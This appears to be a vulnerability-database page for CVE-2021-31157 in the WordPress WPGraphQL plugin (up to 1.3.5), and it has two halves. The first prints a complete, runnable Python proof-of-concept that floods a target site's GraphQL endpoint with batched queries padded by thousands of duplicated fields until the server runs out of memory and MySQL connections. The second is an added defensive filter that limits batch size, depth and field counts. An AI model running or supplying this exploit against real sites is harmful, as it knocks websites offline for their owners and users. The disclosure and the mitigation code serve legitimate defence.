WordPress GraphQL 1.3.5 Denial of Service attack using field duplication and batched queries to cause server OOM and MySQL connection error
Title | Published | Views | Family
---|---|---|---
WordPress WPGraphQL plugin <= 1.3.5 - Denial of Service vulnerability | 12 Apr 2021 00:00 | – | patchstack
CVE-2021-31157 | 20 Apr 2022 19:48 | – | cve
WPGraphQL < 1.3.6 - Denial of Service | 27 Apr 2021 00:00 | – | wpvulndb
Source | Link |
---|---|
vulners | www.vulners.com/exploitdb/EDB-ID:49807 |
"""
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""
import sys
import requests
def usage():
print('* WordPress GraphQL 1.3.5 Denial of Service *')
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
print('python {} http://site.com 10000 100'.format(sys.argv[0]))
sys.exit(1)
if len(sys.argv) < 4:
print('Missing arguments!')
usage()
def wpgql_exists():
try:
r = requests.post(WORDPRESS_URL, json='x')
if 'GraphQL' in r.json()['errors'][0]['message']:
return True
except:
pass
return False
# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])
if wpgql_exists is False:
print('Could not identify GraphQL running at "/index.php?graphql"')
sys.exit(1)
queries = []
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
for _ in range(0, CHAINED_REQUESTS):
queries.append(query)
r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())
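The two amplification knobs the PoC relies on, repeated fields inside one selection set and many operations batched into one request body, are both visible before the GraphQL executor runs a single resolver. The following is an added example of a request-side guard that counts them and rejects oversized requests up front; it is not code from the WPGraphQL project or from the PoC, and the limit values, the `check_request`/`query_stats` names and the coarse tokenizer are assumptions chosen for illustration.

```python
"""
Pre-execution request filter for a GraphQL endpoint (added example, not part
of the WPGraphQL plugin or the PoC). It counts batched operations, selection
depth and selected fields per query string and refuses requests that exceed
configured limits before any database work is done.
"""
import re

# Illustrative limits (assumptions); tune to what the real schema needs.
MAX_BATCH_OPERATIONS = 10
MAX_SELECTION_DEPTH = 10
MAX_SELECTED_FIELDS = 500

_ARGS_RE = re.compile(r'\([^)]*\)')                     # drop "(first: 10)" argument lists
_TOKEN_RE = re.compile(r'[A-Za-z_][A-Za-z0-9_]*|[{}]')  # identifiers and braces only
_KEYWORDS = {'query', 'mutation', 'subscription', 'fragment', 'on'}


def query_stats(query):
    """Return (max_depth, field_count) for a GraphQL document string.

    Coarse brace/identifier scan rather than a full parser: every identifier
    inside a selection set counts as one selected field, so a field that is
    duplicated is counted every time it appears, which is what the DoS abuses.
    """
    depth = max_depth = fields = 0
    for tok in _TOKEN_RE.findall(_ARGS_RE.sub('', query)):
        if tok == '{':
            depth += 1
            max_depth = max(max_depth, depth)
        elif tok == '}':
            depth = max(depth - 1, 0)
        elif depth > 0 and tok not in _KEYWORDS:
            fields += 1
    return max_depth, fields


def check_request(body):
    """Return (allowed, reason) for a decoded JSON request body (dict or list)."""
    operations = body if isinstance(body, list) else [body]
    if len(operations) > MAX_BATCH_OPERATIONS:
        return False, 'batch of %d operations exceeds %d' % (len(operations), MAX_BATCH_OPERATIONS)
    for i, op in enumerate(operations):
        if not isinstance(op, dict) or not isinstance(op.get('query'), str):
            return False, 'operation %d is not a GraphQL request object' % i
        depth, fields = query_stats(op['query'])
        if depth > MAX_SELECTION_DEPTH:
            return False, 'operation %d depth %d exceeds %d' % (i, depth, MAX_SELECTION_DEPTH)
        if fields > MAX_SELECTED_FIELDS:
            return False, 'operation %d selects %d fields, limit %d' % (i, fields, MAX_SELECTED_FIELDS)
    return True, 'ok'


def amplified_query(duplications):
    """Constructed sample with the same shape as the PoC payload (no network used)."""
    payload = 'content \n comments { \n nodes { \n content } }' * duplications
    return {'query': 'query { \n posts { \n nodes { \n ' + payload + '} } }'}


if __name__ == '__main__':
    normal = {'query': 'query { posts(first: 10) { nodes { id title } } }'}
    print(check_request(normal))                      # (True, 'ok')
    print(check_request(amplified_query(200)))        # rejected: too many selected fields
    print(check_request([amplified_query(1)] * 50))   # rejected: batch too large
```

The scan deliberately over-counts (an alias or directive name counts as a field) so that it errs on the side of rejecting; a production deployment would replace `query_stats` with the complexity and depth analysis of the GraphQL library in use and pair the limits with per-client rate limiting, since a single batch is only one of the ways to multiply work.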